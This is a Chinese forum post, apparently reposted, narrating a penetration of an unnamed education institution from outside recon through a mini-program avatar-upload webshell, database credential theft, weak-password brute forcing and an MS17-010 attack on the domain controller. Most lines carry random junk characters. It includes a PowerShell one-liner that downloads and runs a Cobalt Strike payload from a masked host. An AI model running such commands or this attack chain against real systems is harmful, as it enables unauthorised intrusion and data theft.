|
; i+ P1 @9 K; T5 Z/ R
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路) G- ]% M. \* m- d M& m" T
+ C P% Y4 ~5 T9 j2 B7 @7 n
5 J0 z, D5 d0 p1 X! Q1 c3 {$ W
" J# C5 `1 B q2 L
m" E) o4 [+ z F) y1 q
! M: V+ V2 j) K( h 正文
* r7 y1 `8 e9 U/ b/ r6 P
' o' T7 \ S0 b- ~3 }+ o. _
# n" `+ s0 w( W7 M7 o7 | $ A0 [: k4 u' y' p
/ B2 C6 }. `) z D4 g
) j5 {1 r# P* ^0 h 目标:www.xxxx.com(一家教育机构)
- n( O& Q4 K, W" s- S打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能8 q/ V, J- t8 }
G) |; S6 X. G# ?' `, I
! O+ y8 n8 c8 H: v' B
 " O. s4 E$ _! v1 g6 _) J
2 ?/ B$ x8 y; K/ }1 i
" U5 e0 y! r$ H& o) S 进行了简单的信息搜集
6 z2 v! D* ?% P$ K- ?
* _6 d& A$ K, v& p# E$ V2 F7 E/ l0 _5 v" |( C' G4 U* ^$ }
, `* Y/ E) i! F F; S+ D
3 O4 y' P1 b1 o% z; @ 子域名搜集
' G h8 O; |; J ; K! D1 G7 b3 C
F+ P2 E% I, A @
I/ i; n3 v' E, N- y/ y9 M
( s8 q: s8 s3 g8 O7 ?: e4 h& q! C' a: H; N- k, ~( |
fofa找资产
- U2 |: A3 k6 L, r% w2 a
/ C7 Y" ]! `+ x* C# x7 P; f
* f; \/ x$ e3 ~, ]" \6 s$ U4 p; f' l 3 K. M1 G* c4 o6 U+ O a# w
8 W3 p2 W u4 z/ F. @$ ~3 R9 ?" v 
: m. \+ n) o2 e6 j x q4 X9 D! }; C
* c t, y; y% y- c4 a1 a+ r* d 一共七个资产。去重之后只有两个。
* P. @$ K. ? |( N, J, O. W
2 N5 J3 E+ M, J- S. b
; l$ Y8 x0 @( j+ g- I0 `: a
2 s1 g S4 B' `2 x, e: k# ?3 _1 j% [( e5 H6 T! A2 I
目录探测8 Z, K; I. u. l8 ~ F0 r! A
+ O( X) m+ A4 o1 O* Q6 S
) `: I5 W2 q/ y/ U1 t; {
# H9 E: n6 b; O6 X1 O. x 9 |* f( i' b' I4 Q1 ~; W
9 z/ H9 n$ E, ^ 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
- k" c h, s) ^/ t8 z: V6 O9 A
6 v* w' F0 m; Q
% @; Q: s* O8 ]5 C; G, Y4 d $ B$ Q2 X9 O1 p; g% E0 y/ b) }
9 g8 H8 E& G" l. o3 M 我又尝试了通过修改返回包来绕过登录界面3 z- J+ K; P; p* D
& Z$ u4 e! c1 u7 X0 r+ o" P4 W$ V' T. a9 t# m3 b
R6 D6 s' e/ p4 h0 a) ] 8 u2 X1 V/ g- \! G8 Y
, ]( q+ I, _: S( R. v5 N
还是不行,尝试注入无果
2 j; ?- z6 j8 x
" V. L$ |* w, y1 i) w/ W% m; g. r" B7 z: z; D% z' R
 ) h% ~6 _0 U1 G& I
0 a$ U" c) Q K$ ^+ r. U; w g% ?4 a; y5 n2 k' K d$ N
不过我目录探测出了一处Spring信息泄露
. a* h3 c( G8 m9 f# i
( P. e; l( O4 P& y: p3 v
$ t3 e" w3 L0 J" e5 ^' ^; A " i; B/ D6 b. D$ F( x0 M, X
) H3 k9 f# _2 t3 S( p) q3 ]0 t& q3 B  * T \0 o5 R+ [
* O( e e6 d9 _: y- q
8 \1 f0 B t& W! \5 z. p' J 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录1 [; d; r" H4 u. I9 ?% i" ^
! U0 N6 f$ \/ ?9 e' K4 ~: U8 K. t! O/ [
7 D; J- c% N% ]( A) ^ ! \0 Q; t5 U( f" a- M
4 U. b" {8 O& @& {: O& s: g 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
% A" `( `, I% k: j) R; @ . C5 }, }/ _) v* ^) K
! |+ I ^" o$ m& N! v# [9 R 
3 h9 g' |! D% h1 d _, `7 z2 } 3 j" P* U3 P7 n* ~2 ^" P8 r- ^
" R- k& |& T* a$ ^! T6 { 获取有些师傅到这一步就手机抓包电脑测了。
/ Q: J) |5 O5 @# G" r. z- m: e/ Y
" t' J! A4 T# n! f. b0 [+ L! c( h
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
. s6 J1 h8 o8 c( b 2 J/ J' _* Z3 M5 i1 \7 N& E+ H6 J
- g/ ?1 @; o6 W) L 其中在一个公众号发现了小程序,可以进行注册。: ?" d/ p# G$ d5 U& q
* f' s8 p$ y8 G) b4 z7 Z R; x' K) N
6 P0 ?7 }& r" ~* X 看到了头像上传,尝试上传获取WebShell
8 t$ d% \4 V; I . w% ^. ~, {# @ C# }" p7 g' k* K
( v# ]& g2 J! M7 b
. ^" R; w- K1 S
2 ?3 M& u; v' W" D& {* j, z3 W' W9 S" ~( Y( T% t
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问- l" p3 f R) e8 m, D' \- j" H/ ^$ Z8 C
# i& Z. P; R \/ w' r5 M. D
( B. {/ {7 r; H" s4 [* N6 F" u
 7 V; E d3 x$ \9 W3 M
2 z* y' y$ H& U( T N" X
# X- V" Y3 {% A 然后上了大马* E( _0 D$ E. Z# E" g9 [" C
2 N; a+ q! O/ [6 }! n5 K. }, ` R1 K" y
 : |* Y2 E: ^3 w
- u6 ~+ o; {+ B( a/ I; {- @% \5 V6 O1 l4 p5 v) d" n' Y( i
2 e0 q! k3 t) y+ P& ~+ z 8 y8 F6 q3 G4 }: r$ [$ a
4 Y8 D1 x3 @# K7 M! T3 U2 K
通过翻找文件发现数据库账号密码
' X, v; }! x! n$ s4 @/ r" E/ @
, k) `. a2 y. z! ^5 k9 ^: q/ ]
- X" Q! K" P M/ \  ! B9 v: j' A; Y6 _/ k- t/ \2 ^
6 M* X/ k$ P# y- z; u; J/ M
, {4 y( ?/ l( U. d. f% f+ h --内网渗透
6 \; t& C# b, L" p4 ?& Y+ [+ Y 8 Q6 x" s0 K7 m' a
x, M' G3 M9 W- E
直接通过powershell执行 cs上线
; F! C( p. p4 H- S
, V X4 h8 S1 v$ y( U2 y5 k- E
. v% X' a" J, G! d! g& f/ X9 u8 E powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"/ V+ s# x6 U6 Y1 d- ~! ]
! A! f! H! H6 X$ f: e; x8 ~" t( ~8 k3 m+ J0 F+ e
6 L( k' S+ E) q: V9 ~
: Y* h/ {" i$ e' i: b8 b: t- f# g
' P# u2 j+ U+ H3 U$ V 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破1 U9 K! T( X6 |
6 Y% T* _" X: u6 |" k& H
2 A; P4 X) B: K7 ]- u- i: ]
 # l5 e3 n, s/ _
( @/ ~2 D! c7 F+ Y$ R$ M v* s
; C# b2 C( Y) G# w" |
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
9 R. m3 m+ {+ ~: R
& y/ w8 w8 h2 z5 x5 m
. R0 ]# N: K( Y/ X4 f C) @3 ?7 t; ~$ d* n2 P" i( w( c: K
8 O% p: w0 E/ U0 x
1 ?0 ^4 t/ ^9 P
 # l% ^# N! H/ ^3 B
8 n. O9 p$ J, k/ f
3 W: L- o( w% a1 r2 D; m2 A 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
# H2 A6 h! k9 y
5 s, N j5 N9 V9 [* z! t8 N
, i3 Z0 s7 |8 }* \) J : b# a( ^9 k7 p+ t$ O5 o
0 l7 X4 ]* d; `0 N5 v @/ G V
& J; w7 u8 T3 _: k% \, y
, d7 M8 L! K5 D1 O7 ^0 l4 {" |# X" ~7 j( D8 F
, C) p9 `5 p8 E6 P2 d
/ N H2 i d9 |, j6 k) T- i0 l
% k: e% B& \& A8 c& ~+ j/ s+ j - t% r+ u1 I9 k4 s
0 i9 {- x2 u1 ~# o! b ; z8 [7 l9 c6 E3 X* i
A6 @2 x! G O, Y9 r$ Z+ O8 N5 M, ]
2 B1 Z# |1 |! `9 [8 D
小结" A7 |5 y( [3 E6 h" [ [. z
* c" R$ L7 t. g1 k
+ X* d- s* Q& P2 n . ]9 r1 w, h/ R T4 t
* F9 I5 R. k$ B% [
. z L. N" B. N4 Y/ `' F 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!+ b Y' m2 Y, R. M- J L A
9 y1 u2 V' i7 @: p" ^6 p( q$ B' e
- P, t' z$ r$ C! [8 l* E
; N) I d+ n- a1 ], y( { , N/ D- p& ^& c' J, t; p5 Q
Y2 W* ~% R6 w+ \ Z$ J/ n
-
3 U; _$ z5 u) q ) j" P+ u! L2 B: t8 X* Z, F% ` G0 R
3 W8 @* Z( ?& ]: e3 o# O% f - # }0 \* j3 f3 h S7 n0 b* \* g
& g) S/ T" Y4 C' R' m$ ~
9 d% \3 W u" p5 r9 Q
! Z, z* m) n8 U% k; U
* c4 K3 y" q4 q9 T; {6 Y" [ 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html" z" f2 H+ C" N3 P1 G9 h- O+ {: N
% u, @ k- B6 P- b# M2 q
2 h3 y: R$ h) Q, E 4 o, D! g z: F" a6 _8 m
| 
发表于 2024-3-1 19:41:32